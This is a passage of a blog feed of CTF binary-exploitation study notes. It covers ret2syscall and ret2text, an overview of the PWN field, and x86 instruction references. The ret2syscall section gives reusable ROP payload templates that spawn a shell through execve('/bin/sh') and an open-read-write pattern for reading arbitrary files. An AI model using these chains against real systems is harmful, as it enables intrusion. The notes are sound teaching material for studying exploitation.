rsi = 0
rdx = 0
syscall
```
### Finding a syscall Gadget
Programs often contain something like:
```
0x401234: syscall
```
Commonly from:
- Error-handling stubs
- __libc_start_main in the PLT 
- Manually written assembly sections

How to search:
```
ROPgadget --binary ./pwn | grep syscall
```
Or search in IDA:

```
text:0000000000402404    syscall
```

Usually we only need the syscall instruction itself, because rax/rdi/rsi/rdx can be set with other gadgets.

### Example Flow for Building execve(&quot;/bin/sh&quot;)

A typical ret2syscall chain:

1. Place the string &quot;/bin/sh\0&quot; at a controllable address
    
2. Find gadgets for popping registers:
    
    - pop rdi; ret
        
    - pop rsi; ret
        
    - pop rdx; ret
        
    - pop rax; ret
        
3. Set the registers
    
4. Jump to syscall
    

### Trampoline Stack Diagram (ASCII Stack Example)

Below is a typical top-down stack diagram. Your preferred rbp-x style corresponds to rsp+x offsets in ROP, so I keep the same style here:

```
rsp+0x00  → [ pop rax; ret ]
rsp+0x08  → [ 59 ]                  ; execve syscall number
rsp+0x10  → [ pop rdi; ret ]
rsp+0x18  → [ binsh_addr ]          ; &quot;/bin/sh&quot;
rsp+0x20  → [ pop rsi; ret ]
rsp+0x28  → [ 0 ]
rsp+0x30  → [ pop rdx; ret ]
rsp+0x38  → [ 0 ]
rsp+0x40  → [ syscall ]             ; 最终触发 execve(&quot;/bin/sh&quot;,0,0)
```

Actual execution order:

1. pop rax → rax=59
    
2. pop rdi → rdi=&quot;/bin/sh&quot;
    
3. pop rsi → rsi=0
    
4. pop rdx → rdx=0
    
5. syscall → execve(&quot;/bin/sh&quot;)
    

### Placing the &quot;/bin/sh&quot; String

It is usually written into the bss section:

```
binsh = bss_addr + 0x100
payload += pop_rdi; ret
payload += binsh
payload += write_str(&quot;/bin/sh\0&quot;)
```

Or directly use the address in libc (if libc has been leaked):

```
next(libc.search(b&quot;/bin/sh&quot;))
```

But ret2syscall usually does not depend on libc, so writing it to bss is recommended.

### Common syscall Combination Templates

The following structures can be reused directly.

#### execve(&quot;/bin/sh&quot;, 0, 0)

```python
payload  = b&quot;A&quot;*offset
payload += p64(pop_rax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)
```

#### open-read-write Pattern

Open the file first, then read and write:

```
rax = 2   open
rdi = filename
rsi = 0
rdx = 0
syscall

rax = 0   read
rdi = fd
rsi = buf
rdx = len
syscall

rax = 1   write
rdi = 1
rsi = buf
rdx = len
syscall
```

Can be used to read the flag or any arbitrary file.

### Common Pitfalls

#### 1. The syscall gadget may fail

Some programs have custom sandboxes, or `syscall` may be non-executable in certain sections.

#### 2. Stack alignment issues (very important)

On x86_64, before executing syscall, the system requires:

```
rsp % 16 == 0
```

Otherwise it may crash (or trigger unexpected behavior).

Usually, make the post-ret stack address:

```
payload_len % 16 == 8
```

Because ret makes rsp+=8, turning it into 16-byte alignment.

#### 3. Cannot find pop-register gadgets

You can use the universal gadget in __libc_csu_init (the ret2csu technique you often use) to set registers.

#### 4. No syscall in the program?

In these challenges, syscall is usually hidden somewhere, generally in:

```
__libc_start_main init stub
错误处理段
exit stub
```

### ret2syscall vs ret2libc / ret2system

Comparison:

|Method|Dependency|Advantage|
|---|---|---|
|ret2libc|libc leak|Stable|
|ret2system|system() in libc|Simple to build|
|ret2syscall|Only needs syscall and some pop gadgets|**Lightest dependencies, most universal, can bypass environments where libc is disabled**|

**When PIE, NX, and Canaries are all absent: ret2syscall is the strongest weapon.**

---</content:encoded></item><item><title>ret2text</title><link>https://goosequill.erina.top/en/blog/202511263542/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511263542/</guid><description>Introductory notes on ret2text</description><pubDate>Wed, 26 Nov 2025 06:35:00 GMT</pubDate><content:encoded>##  ret2text

# Detailed Technical Explanation of ret2text
## Technical Overview
ret2text (Return to .text) is one of the most fundamental and classic control-flow hijacking techniques in binary exploitation. By overwriting the return address on the stack, this technique &lt;mark&gt;causes execution to jump to an existing specific code location in the program&apos;s code segment&lt;/mark&gt; (the .text section) when the function returns, thereby altering the program&apos;s normal execution flow.

As the first exploitation technique that every PWN beginner must master, ret2text embodies the core idea of control-flow hijacking: **whoever controls the return address controls the program&apos;s execution flow**. This technique &lt;u&gt;does not depend on external library functions&lt;/u&gt;; it relies entirely on the program&apos;s own code snippets, and &lt;u&gt;offers relatively high reliability and general applicability.&lt;/u&gt;
## In-Depth Analysis of the Technical Principles
### Core Mechanism
The core of ret2text lies in understanding how the function call stack works. When a function executes, its return address is stored at a fixed location in the stack frame. Through memory corruption vulnerabilities such as stack overflows, an attacker can overwrite this return address and modify it to the address of a specific instruction within the program&apos;s code segment.

From an implementation perspective, ret2text takes advantage of how the `ret` instruction works on x86/x64 architectures: this instruction pops data from the top of the stack and jumps to that address for execution. By carefully crafting overflow data, the attacker can control the behavior of the `ret` instruction and achieve a jump to an arbitrary code location.
### Memory Layout Requirements
A successful ret2text attack requires the following memory layout conditions:
1. **Fixed code segment location**: the program should not enable *PIE (Position Independent Executable)* protection; otherwise, randomization of the code segment base address increases the difficulty of locating targets
2. **Target address must be executable**: the target code location must have execute permissions, which is usually naturally satisfied in the code segment on modern systems
3. **Predictable stack address**: when ASLR is enabled, it must be possible to predict or leak the stack address in order to overwrite the return address precisely

## Applicable Scenario Analysis
### Ideal Application Environment
The ret2text technique is best suited to the following scenarios:
- **Compiled with PIE disabled**: the program was compiled without the `-pie` parameter, so the code segment load address is fixed
- **Presence of dangerous functions**: the program contains functions such as `system` and `execve` that can directly obtain a shell
- **Stack overflow vulnerability**: a stack buffer overflow exists that can overwrite the return address
- **NX protection disabled or bypassable**: the target code region has execute permissions

### Typical Vulnerability Matches
This technique mainly applies to the following vulnerability types:
- Stack buffer overflow: classic stack overflow vulnerabilities
- &lt;mark&gt;Format string vulnerabilities&lt;/mark&gt; combined with stack write capabilities
- Certain cases of &lt;mark&gt;off-by-one overflows&lt;/mark&gt; on the stack

## Technical Implementation Steps
### Basic Exploitation Workflow
1. **Vulnerability identification and analysis**
   - Determine the input point where the stack overflow vulnerability exists
   - Analyze the offset between the overflow point and the return address
   - Use debugging tools (such as gdb) to verify the accuracy of the offset

2. **Target function location**
   - Use disassembly tools (such as IDA, objdump) to analyze the program
   - Search for directly exploitable dangerous functions (such as `system(&quot;/bin/sh&quot;)`)
   - Record the exact address of the target function

3. **Payload construction**
   ```python
   # 典型payload结构
   payload = b&quot;A&quot; * offset    # 填充至返回地址前
   payload += p64(target_addr) # 覆盖返回地址为目标函数地址
   ```

4. **Exploitation verification**
   - Send the crafted payload to the target program
   - Verify whether control flow successfully jumps to the target function
   - Obtain a shell or perform the expected operation

### Parameter Passing Techniques
When the target function requires parameters, additional stack frame construction is needed:
- **x86 architecture**: according to the cdecl calling convention, parameters are pushed onto the stack from right to left
- **x64 architecture**: the first several parameters are passed via registers (rdi, rsi, rdx, etc.), so suitable gadgets are needed to set the registers

## Technical Evolution and Related Techniques
### Relationship with Other Techniques
ret2text is the foundation of more complex exploitation techniques:
- **[[ret2libc]]**: when the program itself has no dangerous functions, jump to libc library functions
- **[[ROP]] technique**: chain multiple code snippets together to perform complex operations
- **[[SROP]] technique**: use signal handling mechanisms to perform system calls

### Technical Limitations
The main limitations of ret2text include:
- &lt;mark&gt;Dependence on the presence of dangerous functions in the program&lt;/mark&gt;
- Sensitivity to modern protection mechanisms
- Increased exploitation difficulty when parameter passing is complex

---

*As a cornerstone of control-flow hijacking techniques, the principles and ideas of ret2text run throughout the entire field of binary exploitation. Although modern protection mechanisms have limited its direct application, a deep understanding of ret2text remains irreplaceably valuable for mastering more advanced exploitation techniques. During the learning process, it is recommended to focus on understanding the underlying principles rather than merely using tools, so that you can respond flexibly to various challenges in complex real-world environments.*</content:encoded></item><item><title>Pwn</title><link>https://goosequill.erina.top/en/blog/202511251712/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511251712/</guid><description>Import notes for Pwn</description><pubDate>Tue, 25 Nov 2025 06:17:00 GMT</pubDate><content:encoded>##  Pwn

## PWN Overview (Direction Outline)

```
      ┌────────────────────┐
      │   CTF 总览 (Hub)   │
      └─────────┬──────────┘
                │
                ▼
        ┌──────────────┐
        │     PWN      │  ← 你在这里
        └──────┬───────┘
               │
    ┌──────────┼──────────┐
    ▼          ▼          ▼
知识体系     题目复盘     工具索引
```

PWN (Binary Exploitation) is the CTF field that best trains low-level skills. This note serves as the main hub node for the PWN track, used to connect all subfields, knowledge categories, and toolchains.

## The Goals and Essence of PWN

The core goals of PWN are:
- Understand how a program can be controlled
- Understand memory layout and Linux runtime mechanisms
- Build attack chains through vulnerabilities to hijack control flow or program behavior
- Bypass various modern security mechanisms

The essence of PWN is a complete reasoning process of &quot;from source code → assembly → memory → control flow&quot;.

## The Overall Knowledge Structure of PWN
The PWN knowledge system can generally be divided into the following main lines:
Program fundamentals
- Program compilation and linking process  
- ELF file structure
- Calling conventions  
- Stack frame structure

Common vulnerability types
- Stack overflow  
- Format string vulnerability  
- Integer overflow  
- UAF (Use-After-Free)  
- Double Free  
- Heap overflow  
- Off-by-one

Exploitation techniques
- ret2text  
- ret2libc  
- ROP chain construction  
- Syscall exploitation  
- Heap exploitation basics  
- GOT/PLT mechanism  
- libc leak logic

glibc / ld.so low-level mechanisms
- glibc runtime mechanisms  
- Dynamic linking and symbol resolution  
- Heap management mechanism (ptmalloc)

Security mechanisms and bypasses
- NX  
- PIE  
- ASLR  
- RELRO  
- Stack Canary  
- seccomp  

Toolchain and workflow
- pwntools  
- gdb (including pwndbg / peda)  
- IDA  
- readelf / objdump  
- glibc-all-in-one  
- patchelf

## The Learning Path for PWN (Recommended Starting Route)
1. Build a low-level foundation:  
   Learn to use gdb  
   Understand stack frames and calling conventions  
   Be able to read disassembly (basic instructions + control flow)

2. Master basic vulnerabilities:  
   Stack overflow → ret2libc  
   Format string vulnerabilities → leak + hijack  

3. Go deeper into exploitation chains:  
   ROP  
   Syscall  
   Introductory heap exploitation  

4. Strengthen heap-related skills:  
   chunk structure  
   fastbin and unsortedbin mechanisms  
   Common heap challenge topics (double free, unlink, etc.)

5. Understand the essence of glibc / ld.so:  
   Dynamic linking  
   Symbol resolution  
   libc leak logic  

This is a learning path that will run through all your future writeups and reviews.

## The Relationship Between PWN and Other Fields
- Deeply overlaps with Reverse: you need to understand function logic and assembly  
- Different from Crypto and Web: it tests program logic + low-level security  
- Less coupled with Forensic and Misc, but may involve system understanding  

You can think of PWN as the CTF field that &quot;most tests your control over systems&quot;.
## Secondary Structure Navigation Under PWN (Entering Subsystems)
Under PWN, you will further divide into:
[[PWN知识体系]] (systematic index of all third-level knowledge points)  
[[PWN题目索引]] (summary of all challenge writeups)  
[[PWN工具索引]] (summary of tool-specific topics)
These three together form the main backbone of all PWN content.</content:encoded></item><item><title>CMP</title><link>https://goosequill.erina.top/en/blog/202511230551/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511230551/</guid><description>Import notes for CMP</description><pubDate>Sun, 23 Nov 2025 12:05:00 GMT</pubDate><content:encoded>##  CMP（cmp）

### Basic Function

CMP is used to compare the sizes of two operands, but it does not store the result. Instead, it only updates EFLAGS based on the comparison result.  
Its core behavior is equivalent to performing a virtual subtraction once: `op1 - op2`。

### Instruction Execution Process

The following actions are performed during execution:

1. Compute `op1 - op2` (result not written back)
    
2. Update the flags based on the result: ZF, SF, OF, CF, PF
    

### Instruction Format

`cmp r/m32, r32 cmp r/m64, r64 cmp r/m32, imm32 cmp r/m64, imm32`

### Behavioral Characteristics

- Does not modify either operand
    
- Only updates EFLAGS
    
- Often used together with conditional jumps (`je`/`jne`/`jg`/`jl`, etc.)
    
- Key flags:
    
    - ZF = 1 → the two are equal
        
    - SF/OF/CF are used to determine magnitude, sign, and overflow conditions
        

### Common Uses

- Conditional checks
    
- Loop termination checks
    
- Branch logic control
    
- Used in reverse engineering to infer variable relationships
    
- Used in PWN to determine key branch points in function logic</content:encoded></item><item><title>Stack and Call Class</title><link>https://goosequill.erina.top/en/blog/202511232150/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511232150/</guid><description>Import notes for the Stack and Call Class</description><pubDate>Sun, 23 Nov 2025 03:21:00 GMT</pubDate><content:encoded>##  Stack and Call Class

## Overview

This class of instructions governs the structure of a program&apos;s call chain and is central to function execution and return. In PWN, they are the most sensitive and critical instructions: all stack overflows, return address control, ROP, and call-chain hijacking revolve around these instructions.

Understanding these instructions means mastering the skeleton of program execution.

## Subclass Description

Stack frame construction  
Stack frame destruction  
Function calls and returns  
Control changes to the stack pointer (RSP) and base pointer (RBP)  
Various attack techniques (ROP / ret2...) all depend on a precise understanding of the behavior of these instructions

## Instruction List
### Stack Operations
- [[PUSH]]  
  Pushes data onto the top of the stack and automatically adjusts the stack pointer (esp/rsp) according to the architecture.

- [[POP]]  
  Pops data from the top of the stack into the target register or memory and increments the stack pointer.

### Calls and Returns

- [[CALL]]  
  Calls a function, automatically pushes the return address onto the stack, and transfers control flow to the target function.

- [[RET]]  
  Pops the return address from the stack and jumps to it; this is the basic mechanism of function return.

### Stack Frame Construction and Destruction

- [[LEAVE]]  
  Used for stack frame cleanup before a function returns: equivalent to the combination of `mov rsp, rbp` and `pop rbp`.</content:encoded></item><item><title>Data Transfer Class</title><link>https://goosequill.erina.top/en/blog/202511232111/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511232111/</guid><description>Import notes for the Data Transfer Class</description><pubDate>Sun, 23 Nov 2025 03:21:00 GMT</pubDate><content:encoded>##  Data Transfer Class

## Overview

Data transfer instructions are used to move, load, or store data between registers, memory, and the stack, and are the foundation for understanding the logic of any function.  
The backbone of almost every piece of assembly code is formed by chaining these instructions together—they determine “where the data is” and “where the data needs to go.”

## Subcategory Description

Register ↔ Register  
Register ↔ Memory  
Memory ↔ Memory (rare but possible)  
Special addressing mode handling (such as using LEA for address calculation)  
Stack-direction data transfer (`push`/`pop` also belong to the stack category, but may appear repeatedly)

## Instruction List
### Register / Memory Transfer

- [[MOV]]  
  Moves data between registers, memory, and immediate values; it is the most basic data transfer instruction.

- [[LEA]]  
  Loads an effective address (Load Effective Address), commonly used for address calculation, pointer arithmetic, and offset summation.

### Stack-Related Data Operations

- [[PUSH]]  
  Pushes data onto the top of the stack and adjusts the stack pointer (`esp`/`rsp`) to build the calling environment.

- [[POP]]  
  Pops data from the top of the stack into a register or memory to restore the calling environment.

### Auxiliary

- [[XCHG]]  
  Exchanges the values of two operands (registers or memory), commonly used for atomic operations or scheduling when temporary registers are insufficient.</content:encoded></item><item><title>Operations and Logic</title><link>https://goosequill.erina.top/en/blog/202511231504/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511231504/</guid><description>Import notes for Operations and Logic</description><pubDate>Sun, 23 Nov 2025 03:15:00 GMT</pubDate><content:encoded>##  Operations and Logic

## Overview
This category includes all basic instructions that directly modify the data itself, including arithmetic operations, logical processing, and increment/decrement operations related to loops. These instructions usually directly affect the flag registers (ZF, CF, OF, SF, etc.) and appear most frequently in reverse engineering analysis, encryption/decryption logic, length calculation, and state machine branching.

This category is intended to help you quickly locate “how data is being processed.”

## Subcategory Description

Arithmetic operations: perform addition, subtraction, multiplication, division, counting, and offset-related calculations on numeric values  
Logical operations: transform bit structures (AND, OR, NOT, XOR)  
Increment/decrement operations: common components of loop structures

## Instruction List
### Arithmetic Related
- **[[ADD]]**  
    Performs addition, modifying the carry flag (CF), overflow flag (OF), and others; it is the most common way to accumulate numeric values.
- **[[SUB]]**  
    Performs subtraction while also updating the flags; often similar in effect to `cmp` but actually changes the operand.
- **[[IMUL-MUL]]**  
    Performs signed (`imul`) and unsigned (`mul`) multiplication. The result may span high and low registers (such as RDX:RAX), and OF and CF are updated based on the result.
- **[[IDIV-DIV]]**  
    Performs signed (`idiv`) and unsigned (`div`) division, typically requiring the dividend to be placed in RDX:RAX (or EDX:EAX). If the result overflows or the divisor is 0, an exception is triggered.
- **[[INC]]**  
    Increments the operand by one without affecting CF (Carry Flag); commonly used for loop counters and address offsets.
- **[[DEC]]**  
    Decrements the operand by one, also without affecting CF; commonly seen in countdown loops and structure traversal.

### Logical Related
- **[[XOR]]**  
    Bitwise XOR, commonly used to clear a register (such as `xor eax, eax`), and also used in encryption and obfuscation.
- **[[AND]]**  
    Bitwise AND, used to mask specific bits, extract flag bits, or construct conditional checks.
- **[[OR]]**  
    Bitwise OR, used to set certain bits or combine logical conditions.
- **[[NOT]]**  
    Bitwise NOT, inverting all bits; commonly used in bitwise construction and fast two’s complement processing.

### Shift Instructions (Logical/Arithmetic Structure Processing)

- **[[SHL]]**  
    Logical left shift, filling zeros on the right; used for multiplying by 2ⁿ and constructing bit-field layouts.
    
- **[[SHR]]**  
    Logical right shift, filling zeros on the left; commonly used for dividing by 2ⁿ or extracting high-order structures.
    

### Other Operation Types

- **[[NOP]]**  
    No-operation instruction that does not change register or memory contents; used for structure alignment, padding, debugging, and ROP filling.</content:encoded></item><item><title>JCC Instruction Set</title><link>https://goosequill.erina.top/en/blog/202511220451/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511220451/</guid><description>Import notes for the JCC instruction set</description><pubDate>Sat, 22 Nov 2025 12:04:00 GMT</pubDate><content:encoded>##  JCC Instruction Set

#### JE / JZ
(jump if equal / jump if zero)
Basic function  
Jump when the most recent comparison/arithmetic result is &quot;equal&quot; or the result is 0.
Jump condition (logic)
```
ZF == 1
```
RFLAGS (full diagram)
```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
|carry|zero |sign |overflow|parity|aux|
+-------------------------------+
|  ?  | [1] |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```
Equivalent expression
```
if (ZF == 1) jump;
```
Common uses  
Branching after string or numeric equality checks (commonly used after `cmp`).
#### JNE / JNZ
(jump if not equal / jump if not zero)
Basic function  
Jump when the most recent comparison/arithmetic result is not equal or the result is non-zero.
Jump condition

```
ZF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  | [0] |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (ZF == 0) jump;
```

Common uses  
Continue loops, continue after failed searches, etc.

#### JA / JNBE
(jump if above / jump if not below or equal) (unsigned a &gt; b)
Basic function  
Used for unsigned comparison, indicating strictly greater than (a &gt; b, unsigned).

Jump condition

```
(CF == 0) &amp;&amp; (ZF == 0)
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [0] | [0] |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (!CF &amp;&amp; !ZF) jump; // unsigned a &gt; b
```

Common uses  
Memory length, unsigned index comparisons, etc.

#### JAE / JNB / JNC
(jump if above or equal / jump if not below / jump if not carry) (unsigned a &gt;= b)
Basic function  
Unsigned comparison &gt;=: no borrow (carry).

Jump condition

```
CF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [0] |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (!CF) jump; // unsigned a &gt;= b
```

Common uses  
Boundary checks (unsigned).

Note  
JAE = JNB = JNC (common aliases).

#### JB / JNAE / JC
(jump if below / jump if not above or equal / jump if carry) (unsigned a &lt; b)
Basic function  
Unsigned less than (with borrow).

Jump condition

```
CF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [1] |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (CF == 1) jump; // unsigned a &lt; b
```

Common uses  
Error/boundary checks.  
Note: JC (jump if carry) is an alias of JB.

#### JBE / JNA
(jump if below or equal / jump if not above) (unsigned a &amp;lt;= b)
Basic function  
Unsigned less than or equal.

Jump condition

```
(CF == 1) || (ZF == 1)
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
| [1] |  ?  |  ?  |  ?  |  ?  |  ?  |
|  OR | [1] |     |     |     |     |
+-------------------------------+
```

Equivalent expression

```
if (CF || ZF) jump; // unsigned a &lt;= b
```

Common uses  
Array/buffer boundary checks (unsigned).

#### JG / JNLE
(jump if greater / jump if not less or equal) (signed a &gt; b)

Basic function  
Used for signed integer comparison, indicating strictly greater than (a &gt; b, signed).

Jump condition

```
(ZF == 0) &amp;&amp; (SF == OF)
```

RFLAGS (full diagram)

```
+-------------------------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------------------------+
|  ?  | [0] | [SF]| [OF]|  ?  |  ?  |
|     |     | SF==OF (must be true)              |
+-------------------------------------------------+
```

Equivalent expression

```
if ((ZF == 0) &amp;&amp; (SF == OF)) jump; // signed a &gt; b
```

Typical uses  
Signed comparison branches (such as signed integer sorting or conditional checks).

#### JGE / JNL
(jump if greater or equal / jump if not less) (signed a &gt;= b)

Basic function  
Signed &gt;=.

Jump condition

```
SF == OF
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [SF] | [OF] |  ?  |  ?  |
|        (require SF == OF)           |
+-------------------------------+
```

Equivalent expression

```
if (SF == OF) jump; // signed a &gt;= b
```

Typical uses  
Signed boundary checks.

#### JL / JNGE
(jump if less / jump if not greater or equal) (signed a &lt; b)
Basic function  
Signed less than.
Jump condition
```
SF != OF
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [SF] | [OF] |  ?  |  ?  |
|       (require SF != OF)             |
+-------------------------------+
```

Equivalent expression

```
if (SF != OF) jump; // signed a &lt; b
```

Typical uses  
Signed comparison branches (negative-number-related checks).

#### JLE / JNG
(jump if less or equal / jump if not greater) (signed a &amp;lt;= b)
Basic function  
Signed less than or equal.
Jump condition

```
(ZF == 1) || (SF != OF)
```

RFLAGS (full diagram)

```
+------------------------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+------------------------------------------------+
|  ?  | [1] | [SF]| [OF]|  ?  |  ?  |
|  OR    (or SF != OF)                          |
+------------------------------------------------+
```

Equivalent expression

```
if (ZF || (SF != OF)) jump; // signed a &lt;= b
```

Typical uses  
Signed range checks (&amp;lt;=).

#### JO
(jump if overflow)
Basic function  
Jump when the previous arithmetic operation caused overflow (signed overflow).

Jump condition

```
OF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  | [1] |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (OF == 1) jump;
```

Common uses  
Detect signed overflow (for example, when an addition/subtraction result cannot be represented in the target bit width).

#### JNO
(jump if not overflow)
Basic function  
Jump when there is no overflow.

Jump condition

```
OF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  | [0] |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (OF == 0) jump;
```

#### JS
(jump if sign)
Basic function  
Jump when the result is negative (highest bit is 1), checking the sign bit.

Jump condition

```
SF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [1] |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (SF == 1) jump; // result negative (signed)
```

Common uses  
Detect negative numbers or branch on negative results in signed arithmetic.

#### JNS
(jump if not sign)
Basic function  
Jump when the result is non-negative (highest bit is 0).

Jump condition

```
SF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  | [0] |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (SF == 0) jump;
```

#### JP / JPE
(jump if parity / jump if parity even)
Basic function  
Jump when the parity of the most recent arithmetic or logical result is even (that is, PF == 1). PF indicates that the number of 1 bits in the low 8 bits of the result is even.

Jump condition

```
PF == 1
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  | [1] |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (PF == 1) jump;
```

Common uses  
Used in some parity-check logic in legacy code/protocols.

#### JNP / JPO
(jump if not parity / jump if parity odd)
Basic function  
Jump when PF == 0 (odd parity).

Jump condition

```
PF == 0
```

RFLAGS (full diagram)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  | [0] |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (PF == 0) jump;
```

#### JCXZ / JECXZ / JRCXZ
(jump if CX/ECX/RCX == 0)
Basic function  
Check whether register CX/ECX/RCX is 0 (bitwise compare against immediate 0); if it is 0, jump. Commonly used for fast branching when the loop counter is 0 (short jump).

Jump condition

```
(CX == 0) 或 (ECX == 0) 或 (RCX == 0)
```

RFLAGS (full diagram)  
(These instructions do not directly depend on RFLAGS such as CF/ZF, but logically they are equivalent to comparing whether the register is 0, so they can be understood as depending on the register value rather than FLAGS; for consistency, FLAGS are still illustrated)

```
+-------------------------------+
| CF  | ZF  | SF  | OF  | PF  | AF  |
+-------------------------------+
|  ?  |  ?  |  ?  |  ?  |  ?  |  ?  |
+-------------------------------+
```

Equivalent expression

```
if (RCX == 0) jump;
```

Common uses  
Short loops, special-case branches in string/block processing.

---</content:encoded></item><item><title>DEC</title><link>https://goosequill.erina.top/en/blog/202511225702/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225702/</guid><description>Import notes for DEC</description><pubDate>Sat, 22 Nov 2025 11:57:00 GMT</pubDate><content:encoded>##  DEC (dec)

### Basic function
Performs -1 on the operand:  
`dest = dest - 1`
### Instruction execution process
- Subtract 1 from the destination operand
- Update all flags except CF (different from SUB x,1)

### Instruction format
```
dec r/m8
dec r/m16
dec r/m32
dec r/m64
```
### Behavioral characteristics
- Does not modify CF
- Modifies other common flags (ZF, SF, OF, PF, AF)
- Symmetrical with INC
- Used for loop decrements, countdown counters, etc.

### Common uses
- Common reverse pattern in for-loops
- Move a pointer backward
- Countdown control in state machines
- Simple counter decrement

---</content:encoded></item><item><title>INC</title><link>https://goosequill.erina.top/en/blog/202511225538/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225538/</guid><description>Import notes for INC</description><pubDate>Sat, 22 Nov 2025 11:55:00 GMT</pubDate><content:encoded>##  INC (inc)

### Basic Function
The INC instruction performs a +1 operation on the operand:  
`dest = dest + 1`
### Instruction Execution Process
- Add 1 to the destination operand
- Update all flags except CF

### Instruction Format
```
inc r/m8
inc r/m16
inc r/m32
inc r/m64
```
### Behavioral Characteristics
- Does not modify CF (unlike ADD x,1)
- Modifies flags such as ZF, SF, PF, OF, and AF
- Very fast operation, but when used in arithmetic, pay attention to OF

### Common Uses
- Incrementing loop counters
- Auto-incrementing stack variables and pointers
- Gradually accumulating when constructing numbers
- Constructing data byte-by-byte with offsets in certain encoders/decryptors</content:encoded></item><item><title>RET</title><link>https://goosequill.erina.top/en/blog/202511225446/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225446/</guid><description>Notes on importing RET</description><pubDate>Sat, 22 Nov 2025 11:54:00 GMT</pubDate><content:encoded>##  RET (ret)

### Basic purpose
RET pops the return address from the top of the stack and jumps to it; it is the exit instruction used when a function finishes execution.
Equivalent behavior:
```
pop rip
```
Immediate version:
```
ret 8
```
Equivalent to:
```
pop rip
add rsp, 8
```
Used by calling conventions to clean up arguments.
### Instruction execution process
1. Read the return address from RSP and assign it to RIP
2. Increase RSP by 8 (x64)

### Instruction format
```
ret
ret imm16
```
### Behavioral characteristics
- The jump target is determined entirely by the stack contents
    
- Does not modify EFLAGS
    
- Is the core trampoline of &lt;mark&gt;ROP attacks&lt;/mark&gt;
    
- If the return address is overwritten, program control flow is hijacked
### Common uses
- Function return
- Gadgets in a ROP chain
- Constructing attack patterns such as ret2libc and ret2plt
- Implementing lightweight jumps in shellcode</content:encoded></item><item><title>LEAVE</title><link>https://goosequill.erina.top/en/blog/202511225340/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511225340/</guid><description>Import notes for LEAVE</description><pubDate>Sat, 22 Nov 2025 11:53:00 GMT</pubDate><content:encoded>##  LEAVE (leave)

### Basic purpose
LEAVE is used to restore the stack frame from before a function call, equivalent to cleaning up local variables and restoring the old RBP.
Equivalent behavior:
```
mov rsp, rbp
pop rbp
```
### Instruction execution process
1. Write the value of RBP into RSP (discard the local variable area)
2. Pop the old RBP from the stack

### Instruction format
```
leave
```
### Behavioral characteristics
- &lt;mark&gt;Single-byte instruction&lt;/mark&gt;
- A common epilogue before a function returns
- Shorter and faster than writing the two instructions manually when cleaning up a stack frame
- In overflows: when the saved RBP has been overwritten, `leave` assigns that &quot;fake RBP&quot; to RSP
### Common uses
- Standard function tail: `push rbp` → … → `leave`
- Very clear for debugging stack frames
